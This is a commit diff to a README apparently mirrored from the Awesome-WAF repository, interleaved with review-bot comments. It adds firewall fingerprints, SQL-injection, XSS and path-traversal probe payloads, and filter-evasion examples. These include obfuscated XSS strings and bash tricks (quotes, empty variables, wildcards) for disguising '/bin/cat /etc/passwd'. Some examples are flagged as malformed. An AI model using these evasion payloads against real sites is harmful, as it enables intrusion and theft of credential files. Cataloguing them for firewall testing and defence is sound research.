mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-01-03 13:30:03 +07:00
Added more bypass techniques
This commit is contained in:
parent
31b5db62b4
commit
4bb21ba6b9
92
README.md
@ -58,15 +58,18 @@ Feel free to [contribute](CONTRIBUTING.md).
|
|||||||
- Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight, 360 WAF).
|
- Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight, 360 WAF).
|
||||||
|
|
||||||
### Detection Techniques:
|
### Detection Techniques:
|
||||||
|
To identify WAFs, we need to (dummy) provoke it.
|
||||||
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
||||||
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
||||||
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
|
3. If there is a login page somewhere, try some common (easily detectable) payloads like `" or 1 = 1 --`.
|
||||||
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
|
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
|
||||||
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
5. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL.
|
||||||
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
6. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter.
|
||||||
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
6. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
||||||
|
7. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
||||||
|
8. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
||||||
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
||||||
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
9. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
||||||
|
|
||||||
## WAF Fingerprints
|
## WAF Fingerprints
|
||||||
Wanna detect WAFs? Lets see how.
|
Wanna detect WAFs? Lets see how.
|
||||||
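Review bot: the renumbered list on the right-hand side uses `6.` twice (the `' OR SLEEP(5) OR '` item and the `HTTP/0.9` item), so the items that follow are off by one; renumber the sequence so it runs 1 through 10 with the Tip block still sitting directly under the Drop Action item it refers to. The new item 3 also switches the quote character from `'` to `"`, which looks accidental since the other examples in the list are unchanged.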
@ -84,7 +87,11 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<ul>
|
<ul>
|
||||||
<li>Returns status code <code>493</code> upon unusual requests.</li>
|
<li>Returns status code <code>493</code> upon unusual requests.</li>
|
||||||
<li>On viewing source-code of error page, you will find reference to <code>wzws-waf-cgi/</code> directory.</li>
|
<li>On viewing source-code of error page, you will find reference to <code>wzws-waf-cgi/</code> directory.</li>
|
||||||
<li>Source code may contain reference to <code>wangshan.360.cn</code> URL.</li>
|
<li>Blocked response page source may contain:
|
||||||
|
<ul>
|
||||||
|
<li>Reference to <code>wangshan.360.cn</code> URL.</li>
|
||||||
|
<li><code>Sorry! Your access has been intercepted</code> text snippet.</li>
|
||||||
|
</ul>
|
||||||
<li>Response headers contain <code>X-Powered-By-360WZB</code> Header.</li>
|
<li>Response headers contain <code>X-Powered-By-360WZB</code> Header.</li>
|
||||||
</ul>
|
</ul>
|
||||||
</ul>
|
</ul>
|
||||||
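Review bot: the new `<li>Blocked response page source may contain:` line is never closed with `</li>`, whereas the same construction elsewhere in the table (for example `<li>Blocked response page content may contain:</li>` in the Incapsula entry) closes the item before the nested `<ul>`. Pick one form for the whole table so the nesting renders the same way in every entry.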
@ -638,6 +645,7 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<ul>
|
<ul>
|
||||||
<li>Blocked response page content may contain:</li>
|
<li>Blocked response page content may contain:</li>
|
||||||
<ul>
|
<ul>
|
||||||
|
<li><code>Powered By Incapsula</code> text snippet.</li>
|
||||||
<li><code>Incapsula incident ID</code> keyword.</li>
|
<li><code>Incapsula incident ID</code> keyword.</li>
|
||||||
<li><code>_Incapsula_Resource</code> keyword.</li>
|
<li><code>_Incapsula_Resource</code> keyword.</li>
|
||||||
<li><code>subject=WAF Block Page</code> keyword.</li>
|
<li><code>subject=WAF Block Page</code> keyword.</li>
|
||||||
@ -1245,7 +1253,7 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<li><b>Detectability: </b>Easy</li>
|
<li><b>Detectability: </b>Easy</li>
|
||||||
<li><b>Detection Methodology:</b></li>
|
<li><b>Detection Methodology:</b></li>
|
||||||
<ul>
|
<ul>
|
||||||
<li>Response headers may contain <code>Sucuri</code> or <code>Cloudproxy</code> values.</li>
|
<li>Response headers may contain <code>Sucuri</code> or <code>Cloudproxy</code> keywords.</li>
|
||||||
<li>Blocked response page contains the following text snippet:</li>
|
<li>Blocked response page contains the following text snippet:</li>
|
||||||
<ul>
|
<ul>
|
||||||
<li><code>Access Denied</code> and <code>Sucuri Website Firewall</code> texts.</li>
|
<li><code>Access Denied</code> and <code>Sucuri Website Firewall</code> texts.</li>
|
||||||
@ -1362,7 +1370,7 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<li>Response page contains:</li>
|
<li>Response page contains:</li>
|
||||||
<ul>
|
<ul>
|
||||||
<li><code>http://cdn.virusdie.ru/splash/firewallstop.png</code> picture.</li>
|
<li><code>http://cdn.virusdie.ru/splash/firewallstop.png</code> picture.</li>
|
||||||
<li><code>copy; Virusdie.ru</p></code> text snippet.</li>
|
<li><code>copy; Virusdie.ru</p></code> copyright notice.</li>
|
||||||
<li>Response page title contains <code>Virusdie</code> keyword.</li>
|
<li>Response page title contains <code>Virusdie</code> keyword.</li>
|
||||||
<li>Page metadata contains <code>name="FW_BLOCK"</code> keyword</li>
|
<li>Page metadata contains <code>name="FW_BLOCK"</code> keyword</li>
|
||||||
</ul>
|
</ul>
|
||||||
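Review bot: the snippet `<code>copy; Virusdie.ru</p></code>` looks like a `&copy;` entity whose ampersand was lost, and the `</p>` inside the `<code>` element is a stray closing tag; since this line is being reworded to "copyright notice" anyway, write the entity as `&amp;copy; Virusdie.ru` and drop the `</p>`.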
@ -1418,6 +1426,27 @@ Wanna detect WAFs? Lets see how.
|
|||||||
</ul>
|
</ul>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td>
|
||||||
|
Wordfence (Feedjit)
|
||||||
|
</td>
|
||||||
|
<td>
|
||||||
|
<ul>
|
||||||
|
<li><b>Detectability: </b>Easy</li>
|
||||||
|
<li><b>Detection Methodology:</b></li>
|
||||||
|
<ul>
|
||||||
|
<li>Response headers contain <code>WebKnight</code> keyword.</li>
|
||||||
|
<li>Blocked response page contains:</li>
|
||||||
|
<ul>
|
||||||
|
<li><code>Generated by Wordfence</code> text snippet.</li>
|
||||||
|
<li><code>A potentially unsafe operation has been detected in your request to this site</code> text warning.</li>
|
||||||
|
<li><code>Your access to this site has been limited</code> text warning.</li>
|
||||||
|
<li><code>This response was generated by Wordfence</code> text snippet.</li>
|
||||||
|
</ul>
|
||||||
|
</ul>
|
||||||
|
</ul>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td>
|
<td>
|
||||||
WP Cerber Firewall
|
WP Cerber Firewall
|
||||||
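Review bot: the new Wordfence (Feedjit) entry lists `<li>Response headers contain <code>WebKnight</code> keyword.</li>`, which is a copy-paste from the WebKnight entry; a Wordfence block response would not carry a WebKnight header. Either replace it with a Wordfence-specific header indicator or remove the line and rely on the four body snippets that follow.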
@ -1658,8 +1687,11 @@ __9. String Concatenation__
|
|||||||
- Different programming languages have different syntaxes and patterns for concatenation.
|
- Different programming languages have different syntaxes and patterns for concatenation.
|
||||||
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
||||||
|
|
||||||
|
__Standard__: `<svg/onload-location=javascript:alert%281%29;//`
|
||||||
|
__Obfuscated__: `<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//`
|
||||||
|
|
||||||
__Standard__: `/bin/cat /etc/passwd`
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
__Obfuscated__: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
|
__Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa'''ss'wd`
|
||||||
> Bash allows path concatenation for execution.
|
> Bash allows path concatenation for execution.
|
||||||
|
|
||||||
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
||||||
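Review bot: the new `__Standard__` line reads `<svg/onload-location=...` while its `__Obfuscated__` counterpart reads `<svg/onload=location=...`, so the two do not describe the same input; make them agree. The obfuscated line also contains literal backticks inside a single-backtick code span, which terminates the span early in Markdown; wrap it in a double-backtick span or a fenced block. In the reworked bash example `/bi'n'''/c''at' /e'tc'/pa'''ss'wd` the number of single quotes is odd (13), so the command line is unterminated, and the quote opened after `at` encloses the following space; single quotes must come in pairs and the space must stay outside any quoted span for the example to be a valid demonstration of the concatenation the note below describes.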
@ -1677,10 +1709,7 @@ __Standard__: `<BODY onload=alert()>`
|
|||||||
__Obfuscated__: ```<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>```
|
__Obfuscated__: ```<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>```
|
||||||
|
|
||||||
__Standard__: `<a href=javascript;alert()>ClickMe `
|
__Standard__: `<a href=javascript;alert()>ClickMe `
|
||||||
__Bypassed__:
|
__Bypassed__: `<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe`
|
||||||
```
|
|
||||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
||||||
```
|
|
||||||
|
|
||||||
__10. Line Breaks__
|
__10. Line Breaks__
|
||||||
- Many WAF with regex based filtering effectively blocks many attempts.
|
- Many WAF with regex based filtering effectively blocks many attempts.
|
||||||
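Review bot: the label changes from `__Obfuscated__` (used for every other pair in this section) to `__Bypassed__` here; keep the label consistent. The unchanged `__Standard__` line reads `javascript;alert()` with a semicolon while the new line reads `javascript:alert(1)` with a colon, so the "standard" form is not the payload the obfuscated form is derived from; fix the standard line to match.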
@ -1690,12 +1719,27 @@ __Standard__: `<iframe src=javascript:alert(0)">`
|
|||||||
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
|
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
|
||||||
|
|
||||||
__11. Uninitialized Variables__
|
__11. Uninitialized Variables__
|
||||||
- Uninitialized bash variables can elude regular expression based filters and pattern match.
|
- Uninitialized bash variables can evade bad regular expression based filters and pattern match.
|
||||||
- Uninitialised variables have value null/they act like empty strings.
|
- Uninitialised variables have value null/they act like empty strings.
|
||||||
- Both bash and perl allow this kind of interpretations.
|
- Both bash and perl allow this kind of interpretations.
|
||||||
|
|
||||||
__Standard__: `cat /etc/passwd`
|
> __BONUS:__ Variable names can have any number of random characters. I have represented them here as `$aaaaaa`, `$bbbbbb`, and so on. You can replace them with any number of random chars like `$ushdjah` and so on. ;)
|
||||||
__Obfuscated__: `cat$u $u/etc$u/passwd$u`
|
|
||||||
|
Level 1 Obfuscation: Normal
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: `/bin/cat$u /etc/passwd$u`
|
||||||
|
|
||||||
|
Level 2 Obfuscation: Postion Based
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: <code>$u<b>/bin</b>$u<b>/cat</b>$u $u<b>/etc</b>$u<b>/passwd</b>$u</code>
|
||||||
|
|
||||||
|
Level 3 Obfuscation: Random chars
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: <code>$aaaaaa<b>/bin</b>$bbbbbb<b>/cat</b>$ccccccc $dddddd<b>/etc</b>$eeeeeee<b>/passwd</b>$fffffff</code>
|
||||||
|
|
||||||
|
Level 4 Obfuscation: Wildcard paranoid
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: <code>$aaaaaa<b>/???</b>$bbbbbb<b>/??t</b>$ccccccc $dddddd<b>/???</b>$eeeeeee<b>/??ss??</b>$fffffff</code>
|
||||||
|
|
||||||
__12. Random Tabs__
|
__12. Random Tabs__
|
||||||
- Tabs often help to evade firewalls especially regex based ones.
|
- Tabs often help to evade firewalls especially regex based ones.
|
||||||
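Review bot: "Level 2 Obfuscation: Postion Based" has a typo ("Position"), and the `__BONUS__` note refers to `$aaaaaa`, `$bbbbbb` before those names first appear in Level 3, so it reads better after the Level 4 example. The rewritten first bullet, "evade bad regular expression based filters", is vaguer than the original wording; "loosely written regular expression filters" says what is meant. The `<b>`-highlighted levels mix HTML `<code>` spans with the Markdown backtick spans used everywhere else in the section; either is fine, but use one style within the block.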
@ -1726,9 +1770,7 @@ Accept-Language: en-US,en;q=0.5
|
|||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
</pre>
|
</pre>
|
||||||
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
||||||
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
|
then as the output encoding of the page is UTF-8, it will be rendered as: `<svg/onload=alert()>` which will trigger XSS.
|
||||||
|
|
||||||
Final URL encoded payload: `%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80`
|
|
||||||
|
|
||||||
#### Null Bytes:
|
#### Null Bytes:
|
||||||
- The null bytes are commonly used as string terminator.
|
- The null bytes are commonly used as string terminator.
|
||||||
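Review bot: the rendered result changes from a `<script>alert (1) </ script>` string to `<svg/onload=alert()>`, and the matching "Final URL encoded payload" line is deleted, but the hunk does not touch the request body shown above this paragraph (outside the hunk). Confirm that the request was updated to the new payload too, otherwise the example and its explanation no longer describe the same input; if it was, add the corresponding URL-encoded form back so the reader can reproduce the step.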
@ -2076,19 +2118,19 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
|
|||||||
### Fingerprinting:
|
### Fingerprinting:
|
||||||
__1. Fingerprinting with [NMap](https://nmap.org)__:
|
__1. Fingerprinting with [NMap](https://nmap.org)__:
|
||||||
Source: [GitHub](https://github.com/nmap/nmap) | [SVN](http://svn.nmap.org)
|
Source: [GitHub](https://github.com/nmap/nmap) | [SVN](http://svn.nmap.org)
|
||||||
- Normal WAF Fingerprinting
|
- Normal WAF fingerprinting
|
||||||
`nmap --script=http-waf-fingerprint <target>`
|
`nmap --script=http-waf-fingerprint <target>`
|
||||||
|
|
||||||
- Intensive WAF Fingerprinting
|
- Intensive WAF fingerprinting
|
||||||
`nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 <target>`
|
`nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 <target>`
|
||||||
|
|
||||||
- Generic Detection
|
- Generic detection
|
||||||
` nmap --script=http-waf-detect <target>`
|
` nmap --script=http-waf-detect <target>`
|
||||||
|
|
||||||
__2. Fingerprinting with [WafW00f](https://github.com/EnableSecurity/wafw00f)__:
|
__2. Fingerprinting with [identYwaf](https://github.com/stamparm/identywaf)__:
|
||||||
Source: [GitHub](https://github.com/enablesecurity/wafw00f) | [Pypi](https://pypi.org/project/wafw00f)
|
Source: [GitHub](https://github.com/stamparm/identywaf)
|
||||||
```
|
```
|
||||||
wafw00f <target>
|
python identYwaf.py --delay=2 --proxy=<proxy> <target>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Testing:
|
### Testing:
|
||||||
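Review bot: this hunk replaces the WafW00f entry wholesale with identYwaf, dropping the GitHub and PyPI links for a tool that is still widely used; add identYwaf as a separate `__3.__` entry instead so both remain. Also, the unchanged `` ` nmap --script=http-waf-detect <target>` `` context line carries a leading space inside the backticks that the other two nmap commands do not have.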